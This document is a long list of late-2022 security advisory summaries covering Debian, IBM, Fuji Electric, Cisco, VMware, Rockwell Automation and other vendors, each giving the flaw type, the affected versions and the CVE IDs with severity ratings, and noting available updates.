Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-40150 (High), CVE-2022-45685 (High), CVE-2022-45693 (High),
CVE-2022-37601 (Critical), CVE-2022-45939 (High), CVE-2022-4515 (Critical), CVE-2022-4337
(Medium), CVE-2022-4338 (Medium), CVE-2020-8813 (High), CVE-2020-23226 (Medium),
CVE-2020-25706 (Medium), CVE-2022-0730 (Critical), CVE-2022-46169 (Critical)
Debian has released a security update to resolve a vulnerability in the libcommons-net-java
package, which may lead to leakage of information about services running on the private
network of the client.
CVE ID: CVE-2021-37533 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Fuji Electric has released security updates to address out-of-bounds read and out-of-bounds
write vulnerabilities in Fuji Electric V-SFT and TELLUS, which can cause information
disclosure and/or arbitrary code execution. The affected products are V-SFT v6.1.7.0 and
earlier, and TELLUS v4.0.12.0 and earlier.
CVE ID: CVE-2022-46360, CVE-2022-43448
Fuji Electric has released a security update to address stack-based buffer overflow,
out-of-bounds read and out-of-bounds write vulnerabilities in Fuji Electric V-Server, which can
cause information disclosure and/or arbitrary code execution. The affected products are
V-Server v4.0.12.0 and earlier.
CVE ID: CVE-2022-47908, CVE-2022-41645, CVE-2022-47317
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-1199 (High), CVE-2022-3202 (High), CVE-2022-3541 (High),
CVE-2022-38177 (High), CVE-2022-38178 (High), CVE-2022-0865 (Medium), CVE-2022-0891 (High),
CVE-2022-1056 (Medium), CVE-2021-33621 (High), CVE-2021-4028 (High), CVE-2021-4204
(High)
ABB has released security updates to resolve a vulnerability in ABB products that may cause
the product to stop, make the product inaccessible, take remote control of the product, or
insert and run arbitrary code. The affected products are Infinity DC Power Plant – H5692448
G104 G842 G224L G630-4 G451C(2) G461(2) – comcode 150047415, and Pulsar Plus System
Controller – NE843_S – comcode 150042936.
CVE ID: CVE-2022-1607 (Medium)
Foxit has released an updated Foxit PhantomPDF 10.1.10 to resolve multiple vulnerabilities
in Foxit PhantomPDF 10.1.9.37808 and earlier versions.
CVE ID: CVE-2022-43637, CVE-2022-43638, CVE-2022-43639, CVE-2022-43640,
CVE-2022-43641, CVE-2022-32774, CVE-2022-38097, CVE-2022-37332, CVE-2022-40129
Debian has released a security update to resolve multiple vulnerabilities in the mbedtls
package, which can allow attackers to obtain sensitive information like the RSA private key
or may cause Denial of Service (DoS).
CVE ID: CVE-2019-16910 (Medium), CVE-2019-18222 (Medium), CVE-2020-10932 (Medium),
CVE-2020-10941 (Medium), CVE-2020-16150 (Medium), CVE-2020-36421 (Medium), CVE-2020-36422
(Medium), CVE-2020-36423 (High), CVE-2020-36424 (Medium), CVE-2020-36425 (Medium),
CVE-2020-36426 (High), CVE-2020-36475 (High), CVE-2020-36476 (High), CVE-2020-36478 (High),
CVE-2021-24119 (Medium), CVE-2021-43666 (High), CVE-2021-44732 (Critical), CVE-2022-35409
(Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to resolve an integer overflow vulnerability in the
libksba package, which can result in Denial of Service (DoS) or the execution of arbitrary
code.
CVE ID: CVE-2022-47629
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-31693 (Medium), CVE-2021-46784 (Medium), CVE-2022-2938 (High),
CVE-2022-31630 (High), CVE-2022-3165 (Medium), CVE-2022-3545 (High), CVE-2022-3564 (High),
CVE-2022-3705 (High), CVE-2022-3920 (High), CVE-2022-42252 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Synology has released security updates to address multiple vulnerabilities in Synology
Router Manager (SRM) that allow remote attackers to execute arbitrary commands, conduct
Denial of Service (DoS) attacks, or read arbitrary files. The affected versions are SRM 1.3
and SRM 1.2.
A vulnerability due to the use of a password hash with insufficient computational effort has
been discovered in Priva's TopControl Suite that can allow an attacker to obtain login
credentials and access the product remotely. The affected components are Bacnet prior to
8.7.8.0, Blue ID prior to 8.7.8.0, Compass prior to 8.7.8.0, Connect prior to 8.7.8.0, and
TPC prior to 8.7.8.0.
CVE ID: CVE-2022-3010 (High)
An improper access control vulnerability has been discovered in Rockwell Automation's
Studio 5000 Logix Emulate that can allow a malicious user to perform Remote Code
Execution (RCE), potentially impacting the confidentiality, integrity, and availability of
the software. The affected versions are Studio 5000 Logix Emulate v20 to v33.
CVE ID: CVE-2022-3156 (High)
Omron has released a security update to address an out-of-bounds write vulnerability in
CX-Programmer which can allow arbitrary code execution or loss of sensitive information if a
user opens a specially crafted CX-P file. The affected versions are CX-Programmer 9.78 and
prior.
CVE ID: CVE-2022-43509 (High)
Juniper Networks has released security updates to address an improper input validation
vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS
Evolved that can cause a Denial of Service (DoS). The affected versions are Junos OS
version 22.3R1 and Junos OS Evolved version 22.3R1-EVO.
CVE ID: CVE-2022-22184 (High)
Foxit has released an updated Foxit PDF Editor 11.2.4 to resolve multiple vulnerabilities in
Foxit PDF Editor 11.2.3.53593 and all previous 11.x versions, 10.1.9.37808 and earlier.
A Denial of Service (DoS) vulnerability has been discovered in Mitsubishi Electric's
MELSEC iQ-R and iQ-L series CPU modules and MELIPC series. The affected models
are MELSEC iQ-R Series model R00/01/02CPU firmware versions "32" and prior, model
R04/08/16/32/120(EN)CPU firmware versions "65" and prior, model R08/16/32/120SFCPU and model
R12CCPU-V, all versions, MELSEC iQ-L Series model L04/08/16/32HCPU, all versions, and MELIPC
Series MI5122-VW, all versions.
CVE ID: CVE-2022-33324 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Zyxel has released a security update to resolve a DNS misconfiguration in the NBG7510 home
router that allows an unauthenticated attacker to perform DNS-related attacks by using the
open DNS resolver when the device is switched to AP mode.
CVE ID: CVE-2022-38546 (Medium)
It has been discovered that the installers generated by Squirrel.Windows can insecurely load
Dynamic Link Libraries (DLLs) that may cause arbitrary code execution. The affected versions
are installers generated by Squirrel.Windows 2.0.1 and earlier.
CVE ID: CVE-2022-46330 (High)
+Message App has released security updates to address a vulnerability caused by improper
handling of Unicode control characters in its products. The affected versions are +Message
App for Android prior to version 12.9.5, prior to version 54.49.0500 and prior to version
3.9.2, and +Message App for iOS prior to version 3.9.4.
CVE ID: CVE-2022-43543 (Medium)
Mozilla has released a security update to address a vulnerability in Thunderbird 102.6.1. An
attacker can exploit this vulnerability to take control of an affected system.
CVE ID: CVE-2022-46874 (Medium)
Fuji Electric has released security updates to resolve out-of-bounds write and stack-based
buffer overflow vulnerabilities in Tellus Lite V-Simulator that can allow an attacker to execute
arbitrary code. The affected versions are Fuji Electric Tellus Lite V-Simulator 4.0.12.0 and
prior.
CVE ID: CVE-2022-3087 (High), CVE-2022-3085 (High)
Rockwell Automation has released security updates to address an improper input validation
vulnerability in its GuardLogix, ControlLogix, CompactLogix, and Compact
GuardLogix controllers that can allow a malformed CIP request to cause a major
nonrecoverable fault and a Denial of Service (DoS) condition.
CVE ID: CVE-2022-3157 (High)
ARC Informatique has released security updates to address vulnerabilities that allow
cleartext storage of sensitive information and insertion of sensitive information into a log
file in its PcVue equipment. Successful exploitation can allow access to the email account,
SIM card, and other data sources associated with the affected device. The affected versions
are PcVue 15 through 15.2.2 and PcVue 8.10 through 15.2.3.
CVE ID: CVE-2022-4312 (Medium), CVE-2022-4311 (Medium)
Multiple vulnerabilities such as Cross-Site Scripting (XSS) and improper restriction of
rendered UI layers or frames have been discovered in Rockwell Automation's
MicroLogix 1100 and 1400 equipment that can cause a Denial of Service (DoS) condition or allow for
Remote Code Execution (RCE). The affected versions are all versions of MicroLogix 1100,
MicroLogix 1400 A 7.000 and prior, and MicroLogix 1400 B/C 21.007 and prior.
CVE ID: CVE-2022-46670 (High), CVE-2022-3166 (High)
Delta Industrial Automation has released security updates to address a command injection
vulnerability in the 4G Router DX-3021 that allows adding files, deleting files, or changing
file permissions. The affected versions are DX-3021L9 versions prior to V1.24.
CVE ID: CVE-2022-4616 (High)
A new exploitation method has been discovered that uses CVE-2022-41080 and CVE-2022-41082 to
achieve Remote Code Execution (RCE) through Outlook Web Access.
The method bypasses URL rewrite mitigations for the Autodiscover endpoint provided by
Microsoft in response to ProxyNotShell.
Citrix has released security updates to address multiple vulnerabilities in Citrix
Hypervisor that allow a privileged user in a guest VM to cause the host to become
unresponsive or crash. The affected product is Citrix Hypervisor 8.2 LTSR CU1.
CVE ID: CVE-2022-3643 (Critical), CVE-2022-42328 (Medium), CVE-2022-42329
(Medium)
Red Hat has released Red Hat Advanced Cluster Security for Kubernetes (RHACS) 3.73.1 to
resolve multiple bugs in RHACS 3.73.0. The affected products are Red Hat Advanced Cluster
Security for Kubernetes 3 x86_64.
NVIDIA has released a firmware security update for NVIDIA DGX A100 server and NVIDIA DGX
Station A100 to address multiple vulnerabilities that can lead to code execution, Denial of
Service (DoS), information disclosure, escalation of privileges, loss of data integrity, or
data tampering.
CVE ID: CVE-2022-42271 (High), CVE-2022-42280 (High), CVE-2022-42281 (Medium),
CVE-2022-42288 (Medium)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2017-12240 (Critical), CVE-2017-12235 (High), CVE-2017-12237 (High),
CVE-2017-12232 (High), CVE-2017-6627 (Medium)
Hikvision has released security updates to address an access control vulnerability in
Hikvision wireless bridge products, which can be used to obtain admin permissions. The
affected products are DS-3WF0AC-2NT below V1.1.0, and DS-3WF01C-2N/O below V1.0.4.
CVE ID: CVE-2022-28173 (Critical)
Prosys OPC has released security updates to address an insufficiently protected credentials
vulnerability in UA Simulation Server and UA Modbus Server. The affected products are Prosys
OPC UA Simulation Server 5.3.0 and earlier, and Prosys OPC UA Modbus Server 1.4.18 and
earlier.
CVE ID: CVE-2022-2967 (Medium)
Ubuntu has released security updates to address a use-after-free vulnerability in the Linux
kernel. An attacker can exploit this vulnerability to take control of an affected system.
The affected product is Ubuntu 22.04 LTS.
CVE ID: CVE-2022-42896 (Medium)
VMware has released security updates to address privilege escalation and access control
vulnerabilities in VMware vRealize Operations (vROps).
CVE ID: CVE-2022-31707 (High), CVE-2022-31708 (Medium)
Samba has released security updates to address multiple vulnerabilities in its products. All
versions of Samba prior to 4.15.13, 4.16.8, 4.17.4 are affected.
CVE ID: CVE-2022-38023 (High), CVE-2022-37966 (High), CVE-2022-37967 (High),
CVE-2022-45141 (High), CVE-2022-42898
SHARP has released security updates to address a command injection vulnerability in SHARP
Multifunctional Products (MFP). Successful exploitation can allow an arbitrary command to be
executed on the affected MFP firmware.
CVE ID: CVE-2022-45796 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-42898 (Medium), CVE-2022-40750 (Medium), CVE-2022-39353 (Critical),
CVE-2022-3515 (Critical), CVE-2022-21619 (Low), CVE-2022-21624 (Low), CVE-2022-21626
(Medium), CVE-2022-39399 (Low), CVE-2022-21624 (Low), CVE-2022-40159 (High), CVE-2022-40160
(High), CVE-2022-35255 (High), CVE-2022-34917 (High), CVE-2022-37434 (High), CVE-2022-42004
(Medium), CVE-2022-40154 (Medium)
Debian has released security updates to address multiple vulnerabilities in php7.3,
firefox-esr, and libde265. An attacker can exploit these vulnerabilities to take control of
an affected system.
CVE ID: CVE-2021-21707 (Medium), CVE-2022-31625 (High), CVE-2022-31626 (High),
CVE-2022-31628 (Medium), CVE-2022-31629 (Medium), CVE-2022-37454 (Critical), CVE-2022-46872,
CVE-2022-46874, CVE-2022-46878, CVE-2022-46880, CVE-2022-46881, CVE-2022-46882 (Medium),
CVE-2020-21599 (Medium), CVE-2021-35452 (Medium), CVE-2021-36408 (Medium), CVE-2021-36409
(High), CVE-2021-36410 (Medium), CVE-2021-36411 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-3872 (High), CVE-2022-39328 (High), CVE-2022-3970 (Critical),
CVE-2022-43945 (High), CVE-2022-2827 (High), CVE-2022-40242 (Critical), CVE-2022-40259
(Critical), CVE-2014-0144 (High), CVE-2021-3671 (Medium), CVE-2022-39306 (High),
CVE-2022-39307 (Medium), CVE-2022-31690 (High), CVE-2022-31692 (Critical)
Trend Micro has released security updates to resolve multiple vulnerabilities in Trend Micro
Apex One and Apex One as a Service.
CVE ID: CVE-2022-45797 (High), CVE-2022-45798 (High)
Weidmueller Interface has released a security update to address a JavaScript injection
vulnerability in its XML editing system SCHEMA ST4 online help.
CVE ID: CVE-2022-3073 (Medium)
CODESYS has released security updates to address multiple vulnerabilities in several CODESYS
products.
CVE ID: CVE-2022-22508 (Medium), CVE-2022-4048 (High), CVE-2022-31805 (Critical),
CVE-2022-31806 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-41880 (Medium), CVE-2022-41900 (High), CVE-2022-39353 (Critical),
CVE-2022-21626 (Medium), CVE-2022-42889 (Critical), CVE-2022-37616 (Critical),
CVE-2022-42003 (Medium), CVE-2022-36067 (Critical), CVE-2022-42004 (Medium), CVE-2022-41854
(Medium), CVE-2022-25168 (High), CVE-2021-37404 (Critical), CVE-2022-1552 (High),
CVE-2022-23806 (High), CVE-2018-8023 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-45939 (High), CVE-2022-3524 (High), CVE-2022-3619 (Medium),
CVE-2022-3628 (Medium), CVE-2022-42895 (Medium), CVE-2022-42896, CVE-2022-43945,
CVE-2022-42703, CVE-2022-3524, CVE-2022-3564, CVE-2022-3565, CVE-2022-3566, CVE-2022-3567,
CVE-2022-3594, CVE-2022-3621, CVE-2022-46341, CVE-2022-46342, CVE-2022-46340, CVE-2022-4283,
CVE-2022-46344, CVE-2022-46343
Drupal has released security updates to resolve access bypass and Remote Code Execution
(RCE) vulnerabilities in the File (Field) Paths and H5P - Create and Share Rich Content &
Applications projects respectively, third-party libraries used with Drupal.
Google has released Beta channel 109.0.5414.41 (Platform version: 15236.35.0) for most
ChromeOS devices, Beta channel 109.0.5414.46 for Windows, Mac and Linux, Chrome Beta 109
(109.0.5414.46) for iOS, Chrome Beta 109 (109.0.5414.44) for Android and LTS channel
102.0.5005.193 (Platform Version: 14695.166.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-4178 (High), CVE-2022-4179 (High), CVE-2022-4181 (High),
CVE-2022-4135 (High)
NETGEAR has released a security update to address multiple vulnerabilities in RAX30. The
affected versions are RAX30 1.0.9.92.
CVE ID: CVE-2021-44141 (Medium), CVE-2022-0778 (High)
Debian has released a security update to resolve multiple vulnerabilities in the Git package
that can allow execution of arbitrary commands, leak information from the local filesystem,
and bypass a restricted shell.
CVE ID: CVE-2022-24765 (High), CVE-2022-29187 (High), CVE-2022-39253, CVE-2022-39260
(High)
OpenSSL has released security updates to address a policy constraints double-locking
vulnerability in its products. The affected versions are OpenSSL 3.0.0 to 3.0.7.
CVE ID: CVE-2022-3996 (High)
SonicWall has released security updates to address an arbitrary file deletion vulnerability
in SonicWall Capture Client via the SentinelOne Agent that can allow privilege
escalation and file deletion. The affected versions are versions before SentinelOne Agent
for Windows 22.3.
Microsoft has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Redmine has released a security update to address a cross-site scripting vulnerability in
Redmine. All versions of Redmine are affected.
CVE ID: CVE-2022-44637 (Medium)
Apple has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit some of these vulnerabilities to take control of an affected device.
CVE ID: CVE-2022-46693, CVE-2022-46692, CVE-2022-46698, CVE-2022-42867,
CVE-2022-46691, CVE-2022-46692, CVE-2022-42852, CVE-2022-46696, CVE-2022-46700,
CVE-2022-46698, CVE-2022-46699, CVE-2022-42863, CVE-2022-42856
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.6, Firefox ESR 102.6, and Firefox 108. An attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2022-46880 (High), CVE-2022-46872 (High), CVE-2022-46881 (High),
CVE-2022-46874 (Medium), CVE-2022-46875 (Medium), CVE-2022-46882 (Medium), CVE-2022-46878
(High), CVE-2022-46879 (High), CVE-2022-46877 (Low), CVE-2022-46873 (Medium)
Cisco has released a security update to address an Unauthorized File Access vulnerability in
Cisco Identity Services Engine (ISE). The affected versions are Cisco ISE 3.1, 3.2, and 3.0
and earlier.
CVE ID: CVE-2022-20822 (High)
Dell has released security updates to address multiple vulnerabilities in Dell PowerScale
OneFS that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-45100 (High), CVE-2022-45099 (High), CVE-2022-45101 (High),
CVE-2022-45095 (Medium), CVE-2022-45097 (Medium), CVE-2022-45098 (Medium), CVE-2022-45096
(Medium)
Google has released Chrome 108 (108.0.5359.128) for Android, Stable channel 108.0.5359.124
for Mac and Linux and 108.0.5359.124/.125 for Windows, and Chrome Stable 108
(108.0.5359.112) for iOS.
CVE ID: CVE-2022-4436 (High), CVE-2022-4437 (High), CVE-2022-4438 (High),
CVE-2022-4439 (High), CVE-2022-4440 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a global buffer overflow vulnerability
in pngcheck that can result in the execution of arbitrary code.
CVE ID: CVE-2020-35511 (High)
Mitsubishi Electric has released security updates to resolve a path traversal
vulnerability in the project management function of GENESIS64. The affected versions are
GENESIS64 10.97 to 10.97.2.
CVE ID: CVE-2022-40264 (Medium)
Schneider Electric has released security updates to resolve multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released security updates to address a critical remote arbitrary code execution
vulnerability in Citrix ADC and Citrix Gateway. The affected products are Citrix ADC and
Citrix Gateway 13.0 before 13.0-58.32, Citrix ADC
and Citrix Gateway 12.1 before 12.1-65.25, Citrix ADC 12.1-FIPS before 12.1-55.291
and Citrix ADC 12.1-NDcPP before 12.1-55.291.
CVE ID: CVE-2022-27518 (Critical)
VMware has released security updates to address multiple vulnerabilities in VMware Workspace
ONE Access and Identity Manager, VMware vRealize Network Insight (vRNI), and VMware ESXi,
Workstation, and Fusion.
CVE ID: CVE-2022-31705 (Critical), CVE-2022-31700 (High), CVE-2022-31701
(Medium), CVE-2022-31702 (Critical), CVE-2022-31703 (High)
Contec has released a security update to address an OS command injection vulnerability in
its CONPROSYS HMI System (CHS). Successful exploitation can allow an attacker to send
specially crafted requests that execute commands on the server. The affected versions
are CONPROSYS HMI System (CHS) 3.4.4 and prior.
CVE ID: CVE-2022-44456 (Critical)
Schneider Electric has released security updates to resolve multiple vulnerabilities in APC
Easy UPS Online Monitoring Software. The affected versions are APC Easy UPS Online
Monitoring Software V2.5-GA and prior, and V2.5-GA-01-22261 and prior.
CVE ID: CVE-2022-42970 (Critical), CVE-2022-42971 (Critical), CVE-2022-42972 (High),
CVE-2022-42973 (High)
Ubuntu has released security updates to address several vulnerabilities in the Pillow, Vim and
Containerd packages that allow an attacker to take control of an affected system.
CVE ID: CVE-2022-24303 (Critical), CVE-2022-45198 (High), CVE-2022-23471 (Medium),
CVE-2022-31030 (Medium), CVE-2022-24769 (Medium), CVE-2022-24778 (High)
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-41267 (Critical), CVE-2022-41272 (Critical), CVE-2022-42889
(Critical), CVE-2022-41271 (Critical)
HP has released security updates to resolve escalation of privilege, arbitrary code
execution, and information disclosure vulnerabilities in HP Security Manager.
CVE ID: CVE-2022-46358 (High), CVE-2022-46357 (High), CVE-2022-46359 (High),
CVE-2022-46356 (High), CVE-2020-15522 (Medium)
A vulnerability has been discovered in IFM Moneo Appliance that allows an attacker to reset the
administrator password by supplying only the serial number. The affected versions are IFM
Moneo Appliance 1.9.3 and below.
CVE ID: CVE-2022-3485 (Critical)
It has been discovered that SQLite, when relying on --safe for execution of an untrusted CLI
script, does not properly implement the azProhibitedFunctions protection mechanism, and
instead allows UDF functions such as WRITEFILE. The affected versions are SQLite through
3.40.0.
CVE ID: CVE-2022-46908 (Critical)
A vulnerability has been discovered in a GitHub repository that allows for the exposure of
sensitive information. The affected versions are GitHub repository eventsource/eventsource
prior to v2.0.2.
CVE ID: CVE-2022-1650 (Critical)
Fortinet has released security updates to address a heap-based buffer overflow vulnerability
in FortiOS SSL-VPN that allows an attacker to execute arbitrary code or commands via specially
crafted requests.
CVE ID: CVE-2022-42475 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-39353 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in Squid. An
attacker can exploit these vulnerabilities to take control of an affected system. The
affected product is Ubuntu 16.04 ESM.
CVE ID: CVE-2016-2569 (High), CVE-2016-2570 (High), CVE-2016-2571 (High),
CVE-2016-3948 (High), CVE-2018-1000024 (High), CVE-2018-1000027 (High)
Debian has released a security update to address an information leak vulnerability in
node-eventsource. An attacker can exploit this vulnerability to take control of an
affected system.
CVE ID: CVE-2022-1650 (Critical)
A stored cross-site scripting vulnerability has been discovered in the Admin Smart Search
feature in Proofpoint Enterprise Protection (PPS/PoD). The affected versions are Admin Smart
Search 8.19.0 and below.
CVE ID: CVE-2022-46332 (Critical)
Intel has released security updates to address multiple OpenSSL related vulnerabilities in
its products.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
Google has released LTC-108 108.0.5359.75 (Platform Version: 15183.59.0) for most ChromeOS
devices, Dev channel OS version: 15269.0.0, Browser version: 110.0.5447.0 for most ChromeOS
devices, and Dev channel 110.0.5464.2 for Windows, Mac and Linux.
Buffalo has released security updates to address multiple vulnerabilities in its products.
CVE ID: CVE-2022-43466 (Medium), CVE-2022-43443 (Medium), CVE-2022-43486
(Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-35515 (Medium), CVE-2021-35516 (High), CVE-2021-35517 (Medium),
CVE-2021-36090 (High)
A privilege escalation vulnerability in VMware Tools affects BIG-IP and BIG-IQ of F5. A
local, non-administrative attacker can gain elevated privileges on the Guest OS system,
which might affect the confidentiality and integrity of the system.
Multiple vulnerabilities such as arbitrary code execution and unauthorized access have been
discovered in AMI MegaRAC SP-X Baseboard Management Controller affecting Lenovo
products. AMI has released AMI MegaRAC SP-X Baseboard Management Controller (BMC) security
enhancements to address these vulnerabilities.
CVE ID: CVE-2022-40259 (High), CVE-2022-40242 (High), CVE-2022-2827
(High)
Advantech has released a security update to address a SQL injection vulnerability in its
iView equipment. Successful exploitation of this vulnerability can allow an attacker to
acquire credentials. The affected versions are Advantech iView management software
5.7.04.6469 and prior.
CVE ID: CVE-2022-3323 (High)
AVEVA has released a security update to address a relative path traversal vulnerability in its
InTouch Access Anywhere equipment. Successful exploitation of this vulnerability can allow
an unauthenticated user to read files on the system. The affected versions are AVEVA InTouch
Access Anywhere 2020 R2 and older.
CVE ID: CVE-2022-23854 (High)
Rockwell Automation has released security updates to address an improper input validation
vulnerability in its CompactLogix, Compact GuardLogix, ControlLogix, and
GuardLogix controllers. Successful exploitation of this vulnerability can allow an
unauthorized user to cause a denial-of-service condition on a targeted device.
CVE ID: CVE-2022-3752 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2017-11671 (Medium), CVE-2022-1941 (High), CVE-2015-5237 (High),
CVE-2022-45061 (High), CVE-2022-45061 (High), CVE-2022-37454 (Critical), CVE-2016-10228
(Medium), CVE-2019-25013 (Medium), CVE-2020-27618 (Medium), CVE-2017-12132
(Medium)
Cisco has released a security update to resolve an insufficient input validation vulnerability
in the Cisco Discovery Protocol processing feature of Cisco IP Phone 7800 and 8800 Series
firmware. The affected versions are IP Phone 7800 Series and IP Phone 8800 Series (except
Cisco Wireless IP Phone 8821).
CVE ID: CVE-2022-20968 (High)
VMware has released security updates to address multiple vulnerabilities in VMware ESXi,
VMware vCenter Server (vCenter Server), and VMware Cloud Foundation (Cloud Foundation).
CVE ID: CVE-2022-31696 (High), CVE-2022-31697 (Medium), CVE-2022-31698 (Medium),
CVE-2022-31699 (Medium)
Google has released Beta channel 109.0.5414.36 for Windows, Mac and Linux, Chrome Dev 110
(110.0.5462.3) for Android, Chrome Beta 109 (109.0.5414.33) for iOS, and Chrome Beta 109
(109.0.5414.34) for Android.
Huawei has released a security update to address a denial of service vulnerability in the
Wi-Fi module of the HUAWEI Smart WiFi Router. The affected version is HUAWEI WS7100-20 Smart
WiFi Router.
CVE ID: CVE-2022-46740 (Medium)
GitLab has released Community Edition and Enterprise Edition version 15.5.6 to resolve a
number of regressions and bugs in 15.5 release and prior versions.
A vulnerability has been discovered in Markdown Preview Enhanced for VSCode and Atom that
allows an attacker to execute arbitrary commands during the GFM export process. The affected
versions are Markdown Preview Enhanced v0.6.5 and v0.19.6.
CVE ID: CVE-2022-45026 (Critical)
A command injection vulnerability via the PDF file import function has been discovered in
Markdown Preview Enhanced for VSCode and Atom that allows an attacker to execute arbitrary
commands during the GFM export process. The affected versions are Markdown Preview Enhanced
v0.6.5 and v0.19.6.
CVE ID: CVE-2022-45025 (Critical)
A SQL injection vulnerability has been discovered in Simple Phone Book/Directory Web App.
The affected version is Simple Phone Book/Directory Web App v1.0.
CVE ID: CVE-2022-45010 (Critical)
An unsafe evaluation of user controlled input vulnerability has been discovered in pdfmake.
The affected versions are pdfmake 0.2.5 and below.
CVE ID: CVE-2022-46161 (Critical)
A vulnerability has been discovered in the Web Client component of TIBCO Software Inc that
allows an attacker to exploit an open redirect on the affected system. The affected version is
TIBCO Software Inc.'s TIBCO Nimbus 10.5.0.
CVE ID: CVE-2022-41559 (Critical)
An authentication-bypass vulnerability has been discovered in Mega System Technologies Inc
MSNSwitch. The affected version is Mega System Technologies Inc MSNSwitch MNT.2408.
CVE ID: CVE-2022-32429 (Critical)
A vulnerability has been discovered in Open Web Analytics (OWA) that allows an attacker to obtain
sensitive user information, which can be used to gain admin privileges by leveraging cache
hashes. The affected versions are Open Web Analytics before 1.7.4.
CVE ID: CVE-2022-24637 (Critical)
Wireshark has released security updates to address a memory exhaustion vulnerability in the
Kafka dissector. The affected versions are Wireshark 4.0.0 to 4.0.1 and 3.6.0 to 3.6.9.
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-12-05 or later address all of these
issues.
An access bypass vulnerability has been discovered in Entity Registration, a third-party
library used by Drupal. The affected versions are Entity Registration 7.1.0 and below 7.1.9.
The updates are available.
A privilege escalation vulnerability has been discovered in Ivanti EPM that allows an attacker
to execute commands with elevated privileges.
CVE ID: CVE-2022-27773 (Critical)
A vulnerability has been discovered in firewall rule which allows all incoming TCP
connections to all programs from any source and to all ports that are created in Windows
Firewall after Zabbix agent installation (MSI).
CVE ID: CVE-2022-43516 (Critical)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-46682 (High), CVE-2022-46683 (Medium), CVE-2022-46684 (High),
CVE-2022-46685 (Medium), CVE-2022-46686 (High), CVE-2022-46687 (High), CVE-2022-46688
(Medium)
Google has released Stable channel 108.0.5359.98 for Mac and Linux and 108.0.5359.98/.99 for
Windows, and Extended Stable channel 108.0.5359.99 for Windows and 108.0.5359.98 for Mac.
An arbitrary file upload vulnerability has been discovered in YITH WooCommerce Gift Cards
premium plugin for WordPress. The affected versions are YITH WooCommerce Gift Cards premium
plugin 3.19.0 and below.
CVE ID: CVE-2022-45359 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in simple-git package. The
affected versions are simple-git before 3.15.0.
CVE ID: CVE-2022-25912 (Critical)
A Remote Code Execution (RCE) vulnerability due to improper user input validation has been
discovered in the gitpython package. All versions of the gitpython package are affected.
CVE ID: CVE-2022-24439 (Critical)
A Denial of Service (DoS) vulnerability has been discovered in MobaXterm. The affected
versions are MobaXterm before v22.1.
CVE ID: CVE-2022-38337 (Critical)
An improper authentication vulnerability has been discovered in Veeam Backup for Google
Cloud v1.0 and v3.0 that allows attackers to bypass authentication mechanisms.
CVE ID: CVE-2022-43549 (Critical)
Debian has released security updates to address multiple vulnerabilities in node-log4js,
node-json-schema, and ruby-rails-html-sanitizer. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-21704 (Medium), CVE-2021-3918 (Critical), CVE-2022-32209
(Medium)
Ubuntu has released security updates to address multiple vulnerabilities in the NumPy
package. An attacker can exploit these vulnerabilities to take control of an affected system.
The affected products are Ubuntu 22.10, Ubuntu 22.04 LTS and Ubuntu 20.04 LTS.
CVE ID: CVE-2021-33430 (Medium), CVE-2021-34141 (Medium), CVE-2021-41495 (Medium),
CVE-2021-41496 (Medium)
Cacti has released a security update to address a command injection vulnerability that
allows an unauthenticated user to execute arbitrary code on a server running Cacti if a
specific data source is selected for any monitored device.
CVE ID: CVE-2022-46169 (Critical)
